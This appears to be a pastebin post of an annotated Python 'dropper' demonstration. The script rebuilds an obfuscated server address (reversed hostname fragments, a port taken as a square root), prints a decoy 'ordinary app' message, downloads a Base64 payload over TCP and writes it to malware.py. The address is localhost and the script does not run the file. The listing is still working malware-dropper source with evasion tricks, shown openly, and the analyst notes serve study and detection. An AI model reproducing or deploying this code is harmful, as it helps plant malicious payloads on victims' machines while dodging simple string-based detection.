FlyFar

dropper/dropper.py

Oct 19th, 2023
Python 2.68 KB | Cybersecurity | 0 0
#!/usr/bin/env python3

"""Demonstration dropper: fetch a Base64-encoded payload over TCP and write it to disk.

Analyst notes on what this listing shows:

* The server address is not stored in clear text. The hostname is rebuilt from
  two reversed string fragments and the port is the integer square root of a
  large constant, so a plain string search for the host or port will not match
  the literals in this file.
* The payload is only Base64-*encoded*; there is no key and no encryption,
  despite the wording of one of the original comments.
* The decoded bytes are written to ``malware.py`` in the current working
  directory. Nothing in this listing executes that file.
"""

import base64
import logging
import socket
import math


class Dropper:
    """Client that connects to a server, receives a payload and dumps it to a file.

    The constructor receives the server address in an obfuscated form and
    decodes it with :meth:`decode_hostname` and :meth:`decode_port`.
    """

    def __init__(self, host1: str, host2: str, number: int) -> None:
        """Decode the server address and create the client socket.

        Args:
            host1: Reversed tail of the hostname.
            host2: Reversed head of the hostname.
            number: Value whose square root is the server port.
        """
        # Construct hostname of the remote server from the first two
        # arguments.
        self._host = self.decode_hostname(host1, host2)
        # Calculate the port number from the last argument.
        self._port = self.decode_port(number)
        # IPv4 TCP socket. No timeout is configured anywhere in this listing,
        # and the socket is never explicitly closed.
        self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    @property
    def host(self) -> str:
        """Decoded hostname of the server that delivers the payload."""
        return self._host

    @host.setter
    def host(self, new_host: str) -> None:
        # Stored as given; no validation is applied.
        self._host = new_host

    def decode_hostname(self, str1: str, str2: str) -> str:
        """Rebuild the hostname by reversing both fragments, second one first.

        With the arguments used in the ``__main__`` block ('tsoh', 'lacol')
        the result is 'localhost'.
        """
        return str2[::-1] + str1[::-1]

    @property
    def port(self) -> int:
        """Decoded TCP port of the server (`int`)."""
        return self._port

    @port.setter
    def port(self, new_port: int) -> None:
        # Stored as given; no range check is applied.
        self._port = new_port

    def decode_port(self, port: int) -> int:
        """Return the integer part of the square root of ``port``.

        With the constant used in the ``__main__`` block (729000000) the
        result is 27000.
        """
        return int(math.sqrt(port))

    @property
    def socket(self):
        """Client socket created in ``__init__``."""
        return self._socket

    def dump_data(self, data: bytes) -> None:
        """Write ``data`` to ``malware.py``, replacing any existing file.

        The path is relative, so the file lands in the process's current
        working directory. This fixed file name is a simple host-side
        indicator for this sample.
        """
        with open('malware.py', 'wb') as file:
            file.write(data)

    def download_malicious_code(self) -> None:
        """Connect to the server, read one chunk, Base64-decode it and save it.

        Returns early (after a debug log entry) if the connection fails.
        Exceptions raised by ``recv`` or ``b64decode`` are not handled here.
        """
        # Create a connection to the server.
        try:
            self.socket.connect((self.host, self.port))
        except socket.error:
            # socket.error is an alias of OSError in Python 3. The message is
            # only emitted when the logging level is DEBUG or lower.
            logging.debug('Dropper could not connect to the server.')
            return

        # Decoy output: printed only after the connection succeeded. The
        # literal text is another static indicator for this sample.
        print(
            'Hello, this is a totally ordinary app. '
            'I\'m surely not doing anything malicous'
        )

        # A single recv() call: at most 1000 bytes of the server's response
        # are read, whatever the server actually sends.
        command = self.socket.recv(1000)
        # The payload is Base64-encoded (an encoding, not encryption); decode
        # it and dump the raw bytes into a file.
        decode_payload = base64.b64decode(command)
        self.dump_data(decode_payload)


if __name__ == '__main__':
    # DEBUG level makes the connection-failure message above visible.
    logging.basicConfig(level=logging.DEBUG)

    # Initialize dropper application. The arguments decode to host
    # 'localhost' and port 27000 (reversed strings, square root).
    dropper = Dropper('tsoh', 'lacol', 729000000)
    # Fetch the payload and write it to malware.py; the file is not executed
    # by this script.
    dropper.download_malicious_code()
Tags: dropper